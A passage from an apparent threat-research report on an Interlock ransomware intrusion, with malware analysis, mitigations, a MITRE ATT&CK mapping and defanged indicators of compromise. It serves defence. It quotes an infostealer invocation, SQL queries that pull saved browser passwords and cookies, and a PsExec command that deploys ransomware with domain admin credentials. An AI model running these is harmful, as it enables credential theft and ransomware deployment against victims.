victim’s endpoint filesystem while using a filter to\r\navoid critical system directories and extensions.\r\nFigure 18: ‘lp’ function within the ransomware script.\r\nNote that the reference to the ‘filter’ variable is used to filter out excluded directories and excluded filetypes.\r\nThe function also incorporates dir.listFiles(filter), which only returns files and directories that pass the filter's criteria. The\r\nfilter (‘filter’) itself is defined to return only the directories not in the EX_D set and files with file extensions that do not\r\nmatch the EX_EXT set, effectively creating a target list while preserving system stability. The corresponding values in these\r\nbase64 encoded sets are shown below in Table 5.\r\nExcluded Directories Excluded File Extensions\r\n$Recycle.Bin .bat\r\nBoot .bin\r\nDocuments and Settings .cab\r\nPerfLogs .cmd\r\nProgramData .com\r\nRecovery .cur\r\nSystem Volume Information .diagcab\r\nWindows .diagcfg\r\n$RECYCLE.BIN .diagpkg\r\nAppData .drv\r\nWindowsApps .hlp\r\nWindows Defender .hta\r\nWindowsPowerShell .ico\r\nWindows Defender Advanced Threat Protection .msi\r\nJava .ocx\r\n  .psm1\r\n.scr\r\n.sys\r\n.ini\r\nThumbs.db\r\n.url\r\n.dll\r\n.exe\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 13 of 24\n\n.ps1\r\nTable 5: Decoded excluded directories and file extensions from within the Interlock ransomware JavaScript file.\r\nThe next function is the function that incorporates the two-step hybrid encryption process to the provided files by encrypting\r\nthe file's unique AES key with the master RSA public key.\r\nFigure 19: Main ‘run’ variable from within JavaScript ransomware file.\r\nFigure 20: ‘PrivLogger’ function used to instantiate an AES encryptor using the hardcoded public key.\r\nThe Log.run() method is the main malware method. First it generates a symmetric Logger (AES), then uses the asymmetric\r\nprivLogger to encrypt the key, appends it, and then encrypts the file. The privLogger code confirms its use of RSA in\r\nencrypt-only mode with the hardcoded key.\r\nWithin the Log class used to perform the encryption there is intermittent (partial) encryption logic that first encrypts a block\r\nof the file and then skips a block to speed up the process on large files.\r\nFigure 21: Snippet of the ‘cryptBlocksByAES’ function that performs encryption of file references by ‘hendle’ file handle\r\nprovided as input.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 14 of 24\n\nThe while loop shows the pattern. It writes an encrypted block (hedle.write) and then immediately jumps the file pointer\r\nforward (hedle.seek), leaving a large chunk of the original file untouched but inaccessible. The skip amount (tsk) also grows,\r\nmaking the process faster on very large files.\r\nInitial Ransomware Deployment\r\nThe initial ransomware deployment was performed on key file and core application servers, via the adversary’s GUI access.\r\nIt was observed in these initial cases that the adversary initially dropped the ransomware executable and a legitimate copy of\r\nthe javaw.exe application into the users AppData roaming directory under directories masquerading as legitimate\r\napplications including ‘FortiClient’, ‘VMware’, and ‘Welcome’.\r\nFollowing this initial ransomware deployment and testing, the adversary employed a custom infostealer malware called\r\n‘move.dll’.\r\nCustom Infostealer Malware Analysis - ‘move.dll’\r\nWhen move.dll executes, it overrides the in-memory code of move.dll with a separate DLL, like the other Interlock malware\r\nobserved in this intrusion. The following analysis is related to the dynamically extracted payload DLL, which we refer to as\r\ncustom infostealer.\r\nThe malware is designed to remotely collect sensitive data from network connected endpoints. The parameter ‘-h’ is used to\r\npass the host/IP of the remote device.\r\nrundll32.exe move.dll start -k key.der -h \u003chostname/IP of target endpoint\u003e\r\nThe sensitive data is collected from several popular web browsers, as listed in Table 6 below.\r\nIndex Browser Related paths\r\n-1 Firefox \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Mozilla\\Firefox\\Profiles\r\n0 Chromium \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Chromium\\User Data\r\n1 Chrome \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Chrome\\User Data\r\n2 Edge \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Microsoft\\Edge\\User Data\r\n3 Opera \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Opera Software\\Opera Stable\r\n4 Opera-GX \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Opera Software\\Opera GX Stable\r\n5 Brave \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\BraveSoftware\\Brave-Browser\\User Data\r\nTable 6. Browsers targeted by custom infostealer.\r\nFigure 22 below shows the malware preparing to copy the Chrome credential file named ‘Login Data’ into a local file,\r\nnamed ‘zGi0UUlYs0’. It copies these profile files from remote to local one by one and then processes them. The malware\r\nretrieves the remote \u003cusername\u003e by enumerating the subfolders within ‘\\\\\u003cIP of target endpoint\u003e\\C$\\Users’. It then copies\r\nthe target profile data files from the remote device to a locally created file with a random name in the %TEMP% directory.\r\nThese profile files, which are in SQLite format, contain sensitive browser data.\r\nFigure 22: Custom infostealer code associated with copying collected files from remote target system.\r\nOnce copied, each file is processed to extract the sensitive data using several SQLite-related APIs and the following SQL\r\ncommands.\r\nSELECT item1, item2 FROM metadata WHERE id = 'password';\r\nSELECT a11 FROM nssPrivate;\r\nSELECT url, title, last_visit_date FROM moz_places ORDER BY last_visit_date DESC;\r\nSELECT p.url, b.title FROM moz_bookmarks b JOIN moz_places p ON b.fk = p.id;\r\nSELECT host || path, name, value, expiry FROM moz_cookies;\r\nSELECT origin_url, username_value, password_value FROM logins WHERE password_value != ''\r\nSELECT host_key || path, name, encrypted_value, expires_utc FROM cookies;\r\nSELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC;\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 15 of 24\n\nFigure 23: SQL Commands\r\nThe data retrieved through these queries includes saved credentials, browser history, cookies, and bookmarks, depending on\r\nthe retrieved artifacts and available data saved on the target endpoint. Once the malware has collected this data from a\r\nremote endpoint, it saves it to a local CSV file. The file name follows the format: ‘\u003cIP of target endpoint\u003e.\u003cusername\u003e.csv’.\r\nWithin the generated CSV, the collected data is split by web browser names and categorized by the data type. As shown in\r\nFigure 25 below, this is the data from Firefox collected on a test machine, where ‘cr’ for credentials, ‘co’ for cookies, ‘hi’ for\r\nbrowser history and ‘bo’ for saved bookmarks.\r\nFigure 25: Display of collected sensitive data from a sample Firefox browser data targeted with this custom infostealer.\r\nLarge Scale Ransomware Deployment\r\nFortiGuard IR assesses that the adversary executed this malware to validate the credentials they would then use for large-scale deployment of their ransomware across the remaining Windows domain. This deployment was achieved through the\r\nexecution of a batch script ‘W_0.bat’ that was executed through existing ScreenConnect access from a compromised user\r\nworkstation. This batch script contained a series of hardcoded PsExec commands which used compromised valid domain\r\nadministrator credentials to execute another version of the 1.ps1 PowerShell script hosted on a share, named ‘out’, on the\r\nvictim’s primary domain controller. An example of one of these commands is shown below in Figure 26.\r\nstart PsExec.exe -d \u003c target_endpoint \u003e -u \"\u003c domain_admin \u003e\" -p \"\u003c domain_admin_password \u003e\" -accepteula -s cmd /c\r\n\"powershell.exe -ExecutionPolicy Bypass -file \\\\\u003c victim_domain_controller \u003e\\out\\1.ps1\"\r\nFigure 26: Example PsExec command within W_0.bat script used to deploy ransomware across victim environment.\r\nThe PowerShell script executed another version of the ransomware java file (update.jar) that was also hosted in the ‘out’\r\nshare on the victim’s primary domain controller.\r\nFollowing this larger-scale ransomware deployment, the adversary deployed a script that created approximately 5000 new\r\ndomain user accounts. The names of the accounts aligned with the victim’s naming convention but were randomized. Once\r\nthese accounts were created, the adversary then used various PowerShell commands to validate that the accounts had been\r\nsuccessfully created. The purpose of this activity was not determined, given that the adversaries had already completed the\r\nactions to meet their objectives.\r\nConclusion\r\nThis intrusion highlights how the Interlock ransomware group operators continue to adapt their tooling to increase\r\nfunctionality, take advantage of new vulnerabilities, and pivot their TTPs to subvert defender controls. Despite this\r\nflexibility in the TTPs they can employ, the continued use of infrastructure already disclosed in open-source threat reporting\r\nhighlights the importance of:\r\nThreat hunting to identify intrusions before business impact is realized.\r\nIntegrating threat intelligence related to threats in an organization’s threat profile into existing tooling to identify\r\nongoing compromises.\r\nIn this case, there were known indicators within the victim environment that had been disclosed for over four months that\r\ncould have allowed them to identify initial compromise and remove adversary access before there was an impact on the\r\nbusiness. Although organizations are exposed to and must process a significant volume of threat reporting, a threat-centric\r\napproach to filtering threat intelligence for threats, and associated indicators, relevant to an organization is essential in the\r\ncurrent threat landscape, especially in the context of financially motivated threat groups.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 16 of 24\n\nRecommendations\r\nDespite some notable deviations in this intrusion flow compared to intrusions associated with the more common\r\nRansomware-as-a-Service (RaaS) affiliates, the practical recommendations for mitigating intrusions or detecting intrusions\r\ncontinue to align with best practices. The following three recommendations below do not require significant resource\r\ninvestment to implement and offer extremely high ROI in the context of the wider ransomware threat.\r\n1. Block the execution of known remote access software explicitly where it is not required to meet standard\r\nbusiness needs. Where remote access software is required, scope exclusions to allow legitimate use. As with any\r\ntype of block, create a detection rule to identify any attempted use of remote access software and monitor it as a high\r\npriority. This functionality can be implemented through any suitable EDR1 solution and should be considered\r\nessential basic EDR functionality. It may also be implemented through a suitable NGFW2.\r\nIntrusion Impact: Force adversaries to operate using less functional, more overt accesses to slow down the\r\nintrusion, reduce efficacy, increase the likelihood of detectable behavior by the adversary and their tooling, and\r\nincrease the effective defender response window.\r\n2. Block workstation-to-workstation SMB and RDP connections. There is a very limited need to use workstation-to-workstation SMB or RDP, and organizations who have business or administrative processes that require this behavior\r\nshould develop alternative solutions that align with modern administrative best practices. These blocks can be\r\nestablished using the Windows firewall to block inbound SMB and RDP connections on any endpoints that are not\r\ndomain controllers, SMB file servers, or hosting SMB shares for core business needs. High-priority alerts should be\r\nbuilt around workstation-to-workstation SMB and RDP connection attempts. There are very limited false positives\r\nassociated with this activity.\r\nIntrusion Impact: Blocks to common lateral movement pathways used for large scale ransomware deployment and\r\nlateral movement increases the time to impact, minimizes the breadth of impact, creates detection opportunities, and\r\nincreases the effective defender response window.\r\n3. Block outbound PowerShell network connections. There is very limited need for standard users within a corporate\r\nnetwork to perform web requests using PowerShell. However, this technique was employed as part of the initial\r\nloader that started this campaign and is a common part of other ClickFix3 and FileFix4 infections. Blocking all\r\noutbound connections associated with PowerShell and PowerShell_ISE and implementing high-priority alerts for this\r\nbehavior is effective at mitigating these prevalent initial access techniques. Like the previous recommendation, this\r\nchange can be easily implemented at a basic level using the Windows firewall.\r\nIntrusion Impact: Denies adversary the ability to use basic PowerShell download cradles to establish an initial\r\nfoothold in a network, preventing initial access and notification of a current campaign that may be targeting the\r\norganization so defenders can identify other potential victims.\r\nMITRE ATT\u0026CK Mapping \u0026 Observables\r\nTA0001: Initial Access\r\nTechnique Technique Description Observed Activity\r\nT1204.004\r\nUser Execution: Malicious\r\nCopy and Paste\r\nIndicators from this intrusion highlight initial access was likely\r\nthrough a MintLoader campaign based around ClickFix.\r\nMitigation \r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block PowerShell network connections\r\nand anomalous cmd and PowerShell usage associated with this technique. FortiAnalyzer integrations with\r\nFortiGuard threat intelligence offer some protections against large-scale campaigns but adversaries can\r\nquickly change infrastructure which reduces the efficacy of this approach in isolation.\r\nTA0002: Execution\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1059.001\r\nCommand and\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nAdversary used PowerShell for the initial download cradle for NodeSnakeRAT\r\npayload and then PowerShell scripts to achieve large-scale ransomware deployment.\r\nThe adversary also used PowerShell and PowerShell ISE through GUI access to test\r\ntheir large deployment scripts prior to execution, for system enumeration and to\r\ndeploy Hotta Killer malware. \r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 17 of 24\n\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block anomalous PowerShell behaviour.\r\nOrganizations can also centralize PowerShell logging into a SIEM or SOAR to assist with detecting\r\nanomalous indicators within logs.\r\nT1059.007\r\nCommand and\r\nScripting\r\nInterpreter:\r\nJavaScript\r\nInterlock ransomware used to encrypt Windows endpoints was implemented as a\r\nJavaScript file (update.jar and jar.jar) executed through a legitimate javaw.exe binary\r\ndropped in one of the following locations:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Welcome\\bin\\javaw.exe\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\FortiClient\\java\\bin\\javaw.exe\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\VMware\\java\\bin\\javaw.exe\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block anomalous PowerShell behaviour.\r\nOrganizations can also centralize PowerShell logging into a SIEM or SOAR to assist with detecting\r\nanomalous indicators within logs.\r\nTA0003: Persistence\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1078 Valid Accounts\r\nThe adversary in this intrusion relied on the use of valid accounts for large scale\r\ndeployment of ransomware later in the intrusion.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiAnalyzer, FortiSIEM, FortiSOAR, FortiGuard Threat\r\nIntelligence\r\nOrganizations should ensure user login logs are centralized and analyzed as part of standard SOC\r\noperations, looking specifically at administrator account behaviour and logins associated with remote\r\nlogins. SIEM solutions that have UBA capabilities, like FortiSIEM, can allow detection of anomalous\r\nadministrator account usage and SOAR capabilities can be used to turn these alerts into containment\r\nactions, minimizing the impact of an intrusion.\r\nT1053.005\r\nScheduled\r\nTask/Job:\r\nScheduled Task\r\nThe adversary leveraged scheduled tasks heavily for persistence of their Interlock\r\nRAT implants. Scheduled task paths were\r\n‘\\Microsoft\\Windows\\Defrag\\ScheduledDefrags’,\r\n‘\\Microsoft\\Windows\\Chkdsk\\TempDefrag’, ‘\\TimeSyncDrive’,\r\n‘\\TimeSyncroDriver’, ‘\\TimeSync’, ‘\\TimeSyncro’.\r\nMitigation \r\nFortinet Security Fabric Controls - FortiEDR, FortiClient, FortiAnalyzer, FortiSIEM, FortiSOAR,\r\nFortiGuard Threat Intelligence \r\nOrganizations should look to centralize logs related to the creation and modification of scheduled tasks in\r\na SIEM and build appropriate detection logic for anomalous behavior, especially where these tasks\r\nreference known proxy execution targets8 or files in anomalous directories. Organizations should also\r\nlook to leverage EDR capabilities to identify anomalous scheduled task creation and execution.\r\nT1543.003\r\nCreate or Modify\r\nSystem Process:\r\nWindows Service\r\nThe adversary installed ScreenConnect via a MSI installer which registered itself as\r\na service. This was performed on several user workstations and was used as\r\nprimary method for interfacing with victim environment during ransomware\r\ndeployment stage.\r\nMitigation \r\nFortinet Security Fabric Controls - FortiEDR, FortiClient, FortiAnalyzer, FortiSIEM, FortiSOAR,\r\nFortiGuard Threat Intelligence \r\nOrganizations should leverage EDR tooling or application control software to minimize the installation\r\nand execution of remote access tooling even as a service. The installed ScreenConnect service used\r\ndedicated C2 infrastructure previously associated with malicious ScreenConnect usage that would be\r\nflagged and blocked by tooling with FortiGuard Threat Intelligence integrations.\r\nTA0005: Defense Evasion\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1070\r\nIndicator\r\nRemoval\r\nThe adversary removed many of their binaries and staged files after exfiltration.\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 18 of 24\n\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nEDR tools such as FortiEDR collect telemetry on malicious and suspicious files as they are created and\r\nexecuted allowing threat intelligence to be extracted and leveraged without access to the files themselves.\r\nT1620\r\nReflective Code\r\nLoading\r\nSeveral components of the Interlock operators' customer malware dynamically load\r\nadditional payloads on execution. This includes the custom infostealer, Interlock\r\nRAT payloads and Hotta Killer.\r\nMitigation \r\nFortinet Security Fabric Controls - FortiEDR\r\nEDR tools such as FortiEDR will identify in-memory payloads which subverts this method of obfuscating\r\nfunctional payloads.\r\nTA0006: Credential Access\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1555\r\nCredentials from\r\nPassword Stores\r\nThe adversary used a custom infostealer to extract passwords from browser\r\npassword stores. The adversary also employed GPPPassword script to dump\r\ncredentials from a compromised endpoint.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR\r\nOrganizations should look to leverage EDR technologies to identify indicators associated with known\r\ninfostealer tooling such as GPPPassword. Organizations should also prevent users from caching\r\npasswords in browser password stores where password stores are linked to corporate accounts. This\r\nprevents adversaries from using a malware foothold running in a user context to gain domain credentials\r\nand escalate access.\r\nTA0007: Discovery\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nThe adversary largely leveraged their GUI access through RDP connections to\r\nperform directory traversal and manually examine files and folders of interest.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiSIEM\r\nMonitoring file access patterns through centralized logs may assist in identifying anomalous file access\r\nand restrict data leakage.\r\nTA0008: Lateral Movement \r\nTechnique Technique Description Observed Activity\r\nT1021.001 \r\nRemote Services: Remote\r\nDesktop Protocol\r\nThe adversary used RDP for lateral movement through their\r\nScreenConnect sessions. This RDP access was used primarily for\r\nlaterally moving from user workstations to webservers\r\nMitigation\r\nFortinet Security Fabric Controls - FortiGate, FortiNDR, FortiAnalyzer, FortiSIEM, FortiSOAR\r\nOrganizations should lock down the use of RDP where there is no business case. Where RDP access is\r\nrequired, and an alternative administrative solution is not feasible, organizations should use jump hosts or\r\nprocedurally limit normal business use. This normalizes RDP traffic within a network and will allow\r\nthem to more effectively use centralized logging to identify anomalous use. Even where organizations\r\nhave disabled RDP services, they should setup detection rules associated with its use.\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nThe adversary used PsExec to perform large scale deployment of their\r\nransomware.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiNDR, FortiSIEM, FortiSOAR, FortiEDR\r\nFortinet Security Fabric Controls - FortiNDR, FortiSIEM, FortiSOAR, FortiEDR\r\nTA0009: Collection\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 19 of 24\n\nT1074 Data Staged\r\nThe adversary staged data in temporary archives (.zip) prior to exfiltration through\r\ndirect GUI access via ScreenConnect.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiSIEM\r\nMonitoring for anomalous file creation patterns through centralized logs, especially in relation to the\r\ncreation of files with common archive file extensions such as ‘.zip’, ‘.rar’ and ‘.7z’ on servers can provide\r\nsolid detection opportunities. EDR tooling such as FortiEDR can provide some telemetry and custom\r\nalerting capability to assist with this.\r\nT1005\r\nData from Local\r\nSystem\r\nThe adversary collected majority of the data they exfiltrated from local systems,\r\nappearing to prefer to directly connect to servers of interest via RDP rather than\r\nremotely access files through alternative methods.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiSIEM, FortiSOAR\r\nMonitoring file access patterns on for critical local files through centralized logs may assist in identifying\r\nanomalous file access and restrict data leakage.\r\nTA0010: Exfiltration\r\nTechnique Technique Description Observed Activity\r\nT1048\r\nExfiltration Over\r\nAlternative Protocol\r\nThe adversary used the AZcopy tool to exfiltrate large volumes of data\r\nfrom the victim file server.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiGate, FortiNDR, FortiAnalyzer, FortiSIEM,\r\nFortiSOAR\r\nEDR technologies such as FortiEDR can be configured to prevent software such as AZcopy from being\r\nused where there is no business need. Network based detections for large block sizes typically associated\r\nwith large-scale exfiltration can be effective at identifying potential exfiltration.\r\nT1041\r\nExfiltration Over C2\r\nChannels\r\nThe adversary used their ScreenConnect access and chained RDP access to\r\nexfiltrate smaller files and folders from the victim environment.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiAnalyzer, FortiSIEM, FortiSOAR\r\nOrganizations should look to utilize UBA detections to identify anomalous user RDP behavior. Where\r\nUBA cannot be employed organizations should attempt to centralize RDP-related logs and utilize basic\r\ndetection logic to identify anomalous RDP usage to minimize impact.\r\nTA0040: Impact\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1486\r\nData\r\nEncrypted for\r\nImpact\r\nThe adversary initially executed Interlock ransomware via an interactive\r\nScreenConnect session and then deployed across the Windows environment via a batch\r\nscript used to access a PowerShell script and execute PsExec. The windows variant\r\nadded the ‘.gif’ extension to encrypted files. The adversary also employed a second\r\nInterlock ransomware variant to encrypt drives on the victims Nutani. x server, this\r\nvariant added the ‘.!nt3rlock’ file extension to encrypted drives.\r\nMitigation\r\n Fortinet Security Fabric Controls - FortiEDR, FortiClient\r\nEDR tools such as FortiEDR effectively block this encryption behavior as observed earlier in the\r\nintrusion. Organizations should ensure they respond to EDR tooling alerts to minimize the impact of\r\nintrusions.\r\nFortiGuard Protections\r\nInterlock ransomware scripts and binaries are detected through the following AV signatures: \r\nJava/Interlock.A1EF!tr\r\nJS/Interlock.D870!tr\r\nW32/Kryptik.HXUY!tr.ransom\r\nLinux/Filecoder_InterLock.A!tr\r\nW64/GenKryptik.HCFC!tr\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 20 of 24\n\nW64/GenKryptik.HHER!tr\r\nW32/Kryptik.HXUY!tr.ransom\r\nW64/Filecoder_Rhysida.D!tr (Note that the reference to Rhysida is due to indicator crossover in earlier Interlock samples.)\r\nFortiEDR’s behavioral detections effectively mitigated the early post-exploitation TTPs deployed in this attack, including\r\nlateral movement attempts, credential access attempts, persistence through scheduled tasks, initial ransomware\r\ndeployment, and privilege escalation attempts. \r\nEngaging the FortiGuard Incident Response Team\r\nFortiGuard Security Advisory Services offer a range of vendor-agnostic consulting services to assess an organization’s\r\ncurrent security posture, help prepare an organization to respond to an incident, and assist with incident response activities\r\nwhen an incident occurs. \r\nIf you experience a cybersecurity incident and require assistance, reach out to us. Our team will engage as soon as possible\r\nwith a free scoping call to assist.\r\nIndicators of Compromise (IOCs)\r\nBefore the release of this article, FortiGuard provided the IOCs below and details of this intrusion to relevant law\r\nenforcement agencies, coordinating with ongoing operations. \r\nIOCs associated with this intrusion are provided below and are also available here to assist with ingestion into automated\r\ntooling: \r\nHost Based Indicators\r\nFull Path File Name Description MD5\r\n/usr/tmp/script\r\n(create path)\r\n/usr/bin/script\r\n(execution path)\r\nscript\r\nInterlock\r\nRansomware –\r\nELF variant\r\nF6B3153F1B2743185686EBA50FD8\r\nC:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\05x3aay1.log 05x3aay1.log NodeSnakeRAT B9B6EA60F4DB494056BF7C5461D\r\nC:\\Users\\\\AppData\\Roaming\\dji8zg3d\\aqwsxvvz.log aqwsxvvz.log Interlock RAT F2A6B481C0363CE9C57AED1F0B3\r\nC:\\Users\\\\AppData\\Roaming\\ro5ryxiu\\g86oofvm.dll g86oofvm.dll Interlock RAT F2A6B481C0363CE9C57AED1F0B3\r\n:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\j1wp4vw8.log j1wp4vw8.log NodeSnakeRAT 6D3B38328FDE19D1275B38393777\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 21 of 24\n\nC:\\Users\\\\AppData\\Roaming\\ywgomm2t\\9gesu23g.log\\nap\\jucheck.jar jucheck.jar NodeSnakeRAT 153C1BFA6FBED3F12977F5600C26\r\nC:\\Users\\\\AppData\\Roaming\\3o55fai8\\k4myle3i.dll k4myle3i.dll Interlock RAT 0B2A8AB43011AEE2DBD828ACEC\r\nC:\\Users\\\\AppData\\Roaming\\ywgomm2t\\9gesu23g.log 9gesu23g.log\r\nJava Runtime\r\nLibraries\r\n(Compressed\r\nGzip)\r\n7992EB6C856AE77392631AA2F502\r\nC:\\Users\\\\AppData\\roaming\\node-v22.11.0-win-x64\\node.log node.log NodeSnakeRAT CEBCEC8BCF9A27F340A898425E2\r\nC:\\Users\\\\AppData\\Roaming\\Welcome\\java.jar java.jar\r\nNodeSnake\r\nRAT payload\r\n583D4A295C4FF7AE8BD4CB2085A\r\nC:\\Users\\\u003ccompromised_user\u003e\\AppData\\Roaming\\Java.zip\\java.jar java.jar\r\nNodeSnakeRAT\r\npayload\r\n583D4A295C4FF7AE8BD4CB2085A\r\nC:\\Users\\\r\n\u003ccompromised_user\u003e\\AppData\\Roaming\\FortiClient\\java\\jar.jar\r\njar.jar\r\nNodeSnake\r\nRAT payload\r\n583D4A295C4FF7AE8BD4CB2085A\r\nC:\\Users\\\u003ccompromised_user\u003e\\AppData\\Roaming\\VMware\\java\\jar.jar jar.jar\r\nNodeSnake\r\nRAT payload\r\n583D4A295C4FF7AE8BD4CB2085A\r\nC:\\Users\\\u003ccompromised_user\u003e\\AppData\\Local\\Temp\\3\\jar.jar\r\nC:\\Users\\\u003ccompromised_user\u003e\\AppData\\Local\\Temp\\4\\jar.jar\r\njar.jar\r\nInterlock\r\nransomware\r\nencryptor\r\nJavaScript\r\n2646B82362C4E70C78FBB795643E\r\nC:\\out\\update.jar update.jar\r\nInterlock\r\nransomware\r\nencryptor\r\nJavaScript\r\n2646B82362C4E70C78FBB795643E\r\nC:\\Users\\\r\n\u003ccompromised_user\u003e\\AppData\\Local\\Temp\\2\\windows\\win4\\win64.exe\r\nwin64.exe AZCopy binary 5FDE28C141371CD60A7D1EFAD9\r\nC:\\poly\\move.dll move.dll Infostealer 2F17DE0A21EE0AB24254D56B25F\r\nC:\\poly\\key.der key.der\r\nInfostealer\r\ncomponent\r\n(move.dll)\r\nF66F2920C3094ACD2E8352082AA\r\nC:\\Users\\\u003ccompromised_user\u003e\\AppData\\Local\\Temp\\ws\\polers.dll polers.dll\r\nHotta Killer\r\ntool\r\nADF4976A229C70DF5A404C45EF9\r\nC:\\Dumps\\jolup.dll jolup.dll\r\nHotta Killer\r\ntool\r\nADF4976A229C70DF5A404C45EF9\r\nC:\\Dumps\\anyon.dll anyon.dll\r\nHotta Killer\r\ntool\r\nADF4976A229C70DF5A404C45EF9\r\nNetwork-Based Indicators \r\nIndicator\r\nType\r\nNetwork Indicator Description First\r\nObserved\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 22 of 24\n\n(In this\r\nintrusion)\r\nIPv4\r\nAddress\r\n138[.]199.156.22 MintLoader IP 31-March-2025\r\nIPv4\r\nAddress\r\n216[.]245.184.181\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n31-March-2025\r\nIPv4\r\nAddress\r\n212[.]237.217.182\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n31-March-2025\r\nIPv4\r\nAddress\r\n168[.]119.96.41\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n31-March-2025\r\nDomain\r\nsuffering-arnold-satisfaction-prior[.]trycloudflare.com\r\nNodeSnakeRAT C2 Domain 31-March-2025\r\nDomain\r\nspeak-head-somebody-stays[.]trycloudflare.com\r\nNodeSnakeRAT C2 Domain 31-March-2025\r\nDomain\r\nmortgage-i-concrete-origins[.]trycloudflare.com\r\nNodeSnakeRAT C2 Domain 31-March-2025\r\nDomain una-idol-ta-missile[.]trycloudflare.com NodeSnakeRAT C2 Domain 31-March-2025\r\nDomain\r\nstrain-brighton-focused-kw[.]trycloudflare.com\r\nNodeSnakeRAT C2 Domain 31-March-2025\r\nDomain\r\nmusicians-implied-less-model[.]trycloudflare.com\r\nNodeSnakeRAT C2 Domain 31-March-2025\r\nIPv4\r\nAddress\r\n45[.]61.136.109 Interlock RAT C2 IP 21-April-2025\r\nIPv4\r\nAddress\r\n128[.]140.120.188 Interlock RAT C2 IP 21-April-2025\r\nIPv4\r\nAddress\r\n177[.]136.225.135 Interlock RAT C2 IP 21-April-2025\r\nIPv4\r\nAddress\r\n37[.]27.216.30\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n22-May-2025\r\nIPv4\r\nAddress\r\n66[.]85.173.36\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n22-May-2025\r\nIPv4\r\nAddress\r\n146[.]70.79.43\r\nNodeSnakeRAT\r\nRedundancy C2 IP\r\n22-May-2025\r\nDomain\r\nnedy-throwing-knock-whats[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 22-May-2025\r\nDomain\r\noclc-publishing-individual-maps[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 22-May-2025\r\nDomain time-syncmicrosoft[.]com NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain cf1-winows-ww[.]com NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain microsoft-iplcloud[.]com NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain\r\nsublime-tragedy-counties-sculpture[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 22-May-2025\r\nDomain\r\nchampagne-businesses-hand-theta[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 22-May-2025\r\nDomain assets-msnds[.]org NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain settings-win-datamicrosoft[.]org NodeSnakeRAT C2 Domain 22-May-2025\r\nDomain settings-datamicrosoft[.]org NodeSnakeRAT C2 Domain 22-May-2025\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 23 of 24\n\nDomain\r\nperiodic-priest-games-assessed[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 22-May-2025\r\nDomain\r\nuncertainty-por-bubble-persian[.]trycloudflare[.]com\r\nNodeSnakeRAT C2 Domain 